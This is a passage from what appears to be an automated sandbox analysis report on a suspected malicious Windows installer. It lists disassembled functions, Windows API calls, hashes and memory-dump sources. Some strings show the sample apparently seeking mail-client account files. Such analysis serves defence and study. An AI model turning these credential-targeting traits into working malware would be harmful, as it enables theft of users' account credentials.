                                                                                                                                                              • Instruction ID: 55f8cdf3df01a777c0dbaa321a1efda4e911ae96b5c12d26ef98282f511ab860
                                                                                                                                                              • Opcode Fuzzy Hash: cf8799fb5079bd55a34da92be84120ab8bf9e47a6122012f4772691d11c33db6
                                                                                                                                                              • Instruction Fuzzy Hash: 5DF0C87A906610ABE20236396C4DF2E3B2B8FDD5B5B670125FB24E6180FF2484074167
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                              • API String ID: 551687249-2449383134
                                                                                                                                                              • Opcode ID: 6905a7c690b2545ed3291ebbf2f163b7175bb9418d6f22e9ad7a2b62f8869abc
                                                                                                                                                              • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                                                                                                              • Opcode Fuzzy Hash: 6905a7c690b2545ed3291ebbf2f163b7175bb9418d6f22e9ad7a2b62f8869abc
                                                                                                                                                              • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 36851E89: lstrlenW.KERNEL32(?,?,?,?,?,368510DF,?,?,?,00000000), ref: 36851E9A
                                                                                                                                                                • Part of subcall function 36851E89: lstrcatW.KERNEL32(?,?,?,368510DF,?,?,?,00000000), ref: 36851EAC
                                                                                                                                                                • Part of subcall function 36851E89: lstrlenW.KERNEL32(?,?,368510DF,?,?,?,00000000), ref: 36851EB3
                                                                                                                                                                • Part of subcall function 36851E89: lstrlenW.KERNEL32(?,?,368510DF,?,?,?,00000000), ref: 36851EC8
                                                                                                                                                                • Part of subcall function 36851E89: lstrcatW.KERNEL32(?,368510DF,?,368510DF,?,?,?,00000000), ref: 36851ED3
                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3685122A
                                                                                                                                                                • Part of subcall function 3685173A: _strlen.LIBCMT ref: 36851855
                                                                                                                                                                • Part of subcall function 3685173A: _strlen.LIBCMT ref: 36851869
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                              • API String ID: 4036392271-1520055953
                                                                                                                                                              • Opcode ID: 70cdbb7c9d792453665336d4ebe6f458baf560b68cd79f47d7b3706e341df070
                                                                                                                                                              • Instruction ID: 20fc9989b5fdff931a679e867cbc64a20a5b7d9d225e433cc3503526c534f670
                                                                                                                                                              • Opcode Fuzzy Hash: 70cdbb7c9d792453665336d4ebe6f458baf560b68cd79f47d7b3706e341df070
                                                                                                                                                              • Instruction Fuzzy Hash: 8021D2B9E102086AEB1097A8EC91FFE7739EF88714F000556F744EB2D1EAB15D808B59
                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,00435000,74DF3410,00436400,00000000,00403323,00436400,00436400,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                                                                                              • CharNextA.USER32(?,00435000,74DF3410,00436400,00000000,00403323,00436400,00436400,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                                                                                              • CharPrevA.USER32(?,?,74DF3410,00436400,00000000,00403323,00436400,00436400,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                              • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                                                                              • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                                                                                                              • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                                                                              • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,36854AEA,?,?,36854A8A,?,36862238,0000000C,36854BBD,00000000,00000000), ref: 36854B59
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 36854B6C
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,36854AEA,?,?,36854A8A,?,36862238,0000000C,36854BBD,00000000,00000000,?,36852082), ref: 36854B8F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                              • Opcode ID: db134808700d1caac59694e904b14f12db8b939cdfd193ea57bf6bdcda7ebf10
                                                                                                                                                              • Instruction ID: 1d340de081d5b26574c6dd0ddfcfd9ed676a3f2cc39e62e52f36cb66f1a15302
                                                                                                                                                              • Opcode Fuzzy Hash: db134808700d1caac59694e904b14f12db8b939cdfd193ea57bf6bdcda7ebf10
                                                                                                                                                              • Instruction Fuzzy Hash: 89F04F75900108BBDB11AF92C808FAEBFBAEF0C355F4141A5EF05B6250DB349A42CA96
                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,0040A438,00435800,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A438,0040A438,00000000,00000000,0040A438,00435800,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                                                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,?,74DF23A0), ref: 0040527A
                                                                                                                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1941528284-0
                                                                                                                                                              • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                                                                                                              • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                                                                                                              • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                                                                                                              • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                                                                                                                              APIs
                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                                              • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                                                                                              • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                                                                                                              • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                                                                                              • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                                                                                                              • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                                                                                                              • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                              • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                                                                                              • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                                                                                                              • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                                                                                              • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                                                                                                              APIs
                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 3685715C
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3685717F
                                                                                                                                                                • Part of subcall function 368556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 36855702
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 368571A5
                                                                                                                                                              • _free.LIBCMT ref: 368571B8
                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 368571C7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                              • Opcode ID: b5b2d2b16a07486233133a5b6bc1d9867df2aa10f4bb8373bd202a082f519a74
                                                                                                                                                              • Instruction ID: fa7ecef2e74c71357d141409c6d6b1d26dcb41237d912259e44ab9f6fa45c8e7
                                                                                                                                                              • Opcode Fuzzy Hash: b5b2d2b16a07486233133a5b6bc1d9867df2aa10f4bb8373bd202a082f519a74
                                                                                                                                                              • Instruction Fuzzy Hash: 420188B6A452157F33110ABB4C5CD7F7E6EDACE9A4352412ABF04D7200DE648C02C5B9
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,3685636D,36855713,00000000,?,36852249,?,?,36851D66,00000000,?,?,00000000), ref: 36855B7F
                                                                                                                                                              • _free.LIBCMT ref: 36855BB4
                                                                                                                                                              • _free.LIBCMT ref: 36855BDB
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36855BE8
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36855BF1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                              • Opcode ID: c584d61953aa0dca6b8d8047f5558a2ba925e4b833b708c58b442663dd5426fb
                                                                                                                                                              • Instruction ID: 1b4f0e0806d60035b41bed48467b522e3dceae4896df668495816db1ac65ba73
                                                                                                                                                              • Opcode Fuzzy Hash: c584d61953aa0dca6b8d8047f5558a2ba925e4b833b708c58b442663dd5426fb
                                                                                                                                                              • Instruction Fuzzy Hash: DF01F47A517701ABA20236381C88E2F3A2A9FCD5B87230025FF25A6141EF28C80A4167
                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(?), ref: 00401E38
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                                                                                                              • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                              • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                                                                                                              • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                                                                                                              • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                                                                                                              • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,368510DF,?,?,?,00000000), ref: 36851E9A
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,368510DF,?,?,?,00000000), ref: 36851EAC
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,368510DF,?,?,?,00000000), ref: 36851EB3
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,368510DF,?,?,?,00000000), ref: 36851EC8
                                                                                                                                                              • lstrcatW.KERNEL32(?,368510DF,?,368510DF,?,?,?,00000000), ref: 36851ED3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 493641738-0
                                                                                                                                                              • Opcode ID: 244e1e6eab09eb10ed4789f531cfa0e853741e085720b00a643af06b8c82817d
                                                                                                                                                              • Instruction ID: 4f742cbc570efeb669cc86a18783e3fa9bb47309ed0400abf89a8f10c6cb8272
                                                                                                                                                              • Opcode Fuzzy Hash: 244e1e6eab09eb10ed4789f531cfa0e853741e085720b00a643af06b8c82817d
                                                                                                                                                              • Instruction Fuzzy Hash: FEF089265001107AD621271AAC85F7F7B7CEFC9B65F44001EFB0893190EB54584392B9
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 368591D0
                                                                                                                                                                • Part of subcall function 3685571E: HeapFree.KERNEL32(00000000,00000000,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?), ref: 36855734
                                                                                                                                                                • Part of subcall function 3685571E: GetLastError.KERNEL32(?,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?,?), ref: 36855746
                                                                                                                                                              • _free.LIBCMT ref: 368591E2
                                                                                                                                                              • _free.LIBCMT ref: 368591F4
                                                                                                                                                              • _free.LIBCMT ref: 36859206
                                                                                                                                                              • _free.LIBCMT ref: 36859218
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 850179318c340328634da3fcddc9f1e1cbc551d123a907a081b87af6032009b9
                                                                                                                                                              • Instruction ID: 387ee86935035de5e423d708f2ad17d9e9070d0990d920546d4f6da5420f73d5
                                                                                                                                                              • Opcode Fuzzy Hash: 850179318c340328634da3fcddc9f1e1cbc551d123a907a081b87af6032009b9
                                                                                                                                                              • Instruction Fuzzy Hash: 7FF062F1915290D7CA10DB59D9C4C1E7BFEEA0C3917926805FB19E7500CB34F881CA61
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 3685536F
                                                                                                                                                                • Part of subcall function 3685571E: HeapFree.KERNEL32(00000000,00000000,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?), ref: 36855734
                                                                                                                                                                • Part of subcall function 3685571E: GetLastError.KERNEL32(?,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?,?), ref: 36855746
                                                                                                                                                              • _free.LIBCMT ref: 36855381
                                                                                                                                                              • _free.LIBCMT ref: 36855394
                                                                                                                                                              • _free.LIBCMT ref: 368553A5
                                                                                                                                                              • _free.LIBCMT ref: 368553B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: db52c11766f4e7e8bd9bb28b4f2f97f4c49bc6860ed05fb3e7706fbf1d8fadaf
                                                                                                                                                              • Instruction ID: 431da54b20d7caa5f8b5537b3f2f36d97475df5d9921f48fc6a354a75e760e73
                                                                                                                                                              • Opcode Fuzzy Hash: db52c11766f4e7e8bd9bb28b4f2f97f4c49bc6860ed05fb3e7706fbf1d8fadaf
                                                                                                                                                              • Instruction Fuzzy Hash: 5AF05E70C26621DBC6015F2899C061C3BB7B70DAA4302B10AFB20B7250DBB105578B93
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe,00000104), ref: 36854C1D
                                                                                                                                                              • _free.LIBCMT ref: 36854CE8
                                                                                                                                                              • _free.LIBCMT ref: 36854CF2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                              • String ID: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                              • API String ID: 2506810119-3565919305
                                                                                                                                                              • Opcode ID: 80c7423c0198a4ccd84bacfed6aceeabb1cded4308bb4fba00e43313616bf09b
                                                                                                                                                              • Instruction ID: 4f5bc565319d717f73d7460bb63d8bd1a1d384d25771088973f3b8e47b6d2bc0
                                                                                                                                                              • Opcode Fuzzy Hash: 80c7423c0198a4ccd84bacfed6aceeabb1cded4308bb4fba00e43313616bf09b
                                                                                                                                                              • Instruction Fuzzy Hash: A9315075E00358AFEB11CF9A8D8099EBBFDEB8D354F124056EB14A7210D7B18E45CB61
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
